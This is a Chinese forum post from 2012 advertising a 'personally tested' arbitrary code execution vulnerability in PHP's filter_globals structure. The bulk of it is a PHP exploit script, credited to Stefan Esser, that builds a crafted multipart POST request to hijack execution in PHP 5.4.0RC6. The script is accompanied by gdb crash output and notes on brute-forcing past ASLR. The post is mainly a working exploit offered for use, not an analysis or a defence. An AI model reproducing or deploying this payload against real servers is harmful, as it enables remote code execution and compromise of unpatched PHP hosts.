PHP 'filter_globals'结构任意代码执行漏洞【亲测可用】

bek · 发表于 2012-3-5 02:03:40


	漏洞版本: Php 5.2.0 - 5.2.17 漏洞描述: PHP是一款流行的编程语言 Php 5.2.0至5.2.17之间存在一个信息泄露问题，并且由于在关闭阶段没有正确清理filter_globals结构可能导致任意代码执行如果在设置PG(modules_activated)为1之前在启动阶段PHP bailout，filter_globals结构在关闭阶段不会被清理。后续请求会使用filter_globals结构没有清理干净的值，使用特制的请求可导致信息泄露和任意代码执行复制代码 <?php /* This script generates a POST header that makes PHP 5.4.0RC6 64 bit try to execute code at 0x1111111111111111 (C) Copyright 2012 Stefan Esser PHP 5.3.9 requires you to know the address of a writable address filled with NULL. 32bit requires you to create a fake 32bit Hashtable instead of a 64bit one Because this vulnerability also allows leaking memory addresses ASLR can be "semi"-defeated. This means around 4000 tries = 4000 requests = 4000 crashes are enough to bruteforce code addresses to execute arbitrary code despite ASLR/NX better exploit might be possible after deeper research + heap massage This specific attack only works if there is no Suhosin-Patch -> RHEL, CentOS (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1, __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350) at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398 398 ht->pDestructor(p->pData); (gdb) i r rax 0x7fd9583352a0 140571464389280 rbx 0x0 0 rcx 0x8 8 rdx 0x111111111111111 76861433640456465 rsi 0x7fd95a077b08 140571495070472 rdi 0x7fd9583352a0 140571464389280 rbp 0x7fff75c47ae0 0x7fff75c47ae0 rsp 0x7fff75c47a80 0x7fff75c47a80 r8 0x7fff75c47bc8 140735169199048 r9 0x1 1 r10 0x6238396661373430 7077469926293189680 r11 0x7fd962f4c8e0 140571644840160 r12 0x7fd966b91da8 140571708038568 r13 0x0 0 r14 0xffffffff00000001 -4294967295 r15 0x7fd964b10538 140571673953592 rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) x/5i $rip => 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>: callq %rdx 0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>: cmpl $0x8,-0x3c(%rbp) 0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>: jne 0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625> 0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>: mov -0x18(%rbp),%rax 0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>: mov 0x10(%rax),%rax (gdb) / $boundary = md5(microtime()); $varname = "xxx"; $payload = ""; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n"; $payload .= chr(16); for ($i=1; $i<78; $i++) { $payload .= chr(0); } for ($i=1; $i<8; $i++) { $payload .= "\x11"; } $payload .= chr(1); for ($i=16+48+1; $i<128; $i++) { $payload .= chr(0); } $payload .= "\n"; for ($i=0; $i<1000; $i++) { $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="我是猪！'.$i.'"'."\n\n"; $payload .= "我是猪！\n"; } $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[]"'."\n\n"; $payload .= "我是猪！\n"; $payload .= "--$boundary\n"; $payload .= 'Content-Disposition: form-data; name="'.$varname.'[0]"'."\n\n"; $payload .= "我是猪！\n"; $payload .= "--$boundary--\n"; echo "POST /index.php HTTP/1.0\n"; echo "Content-Type: multipart/form-data; boundary=$boundary\n"; echo "Content-Length: ",strlen($payload),"\n"; echo "\n"; echo "$payload"; ?> 复制代码*

757338903 · 发表于 2012-3-6 09:04:44


	来顶顶~~！学习一下~！

微信扫一扫分享朋友圈

PHP 'filter_globals'结构任意代码执行漏洞【亲测可用】

相关帖子

评论 1

微信扫一扫 分享朋友圈

PHP 'filter_globals'结构任意代码执行漏洞【亲测可用】

相关帖子

评论 1

微信扫一扫分享朋友圈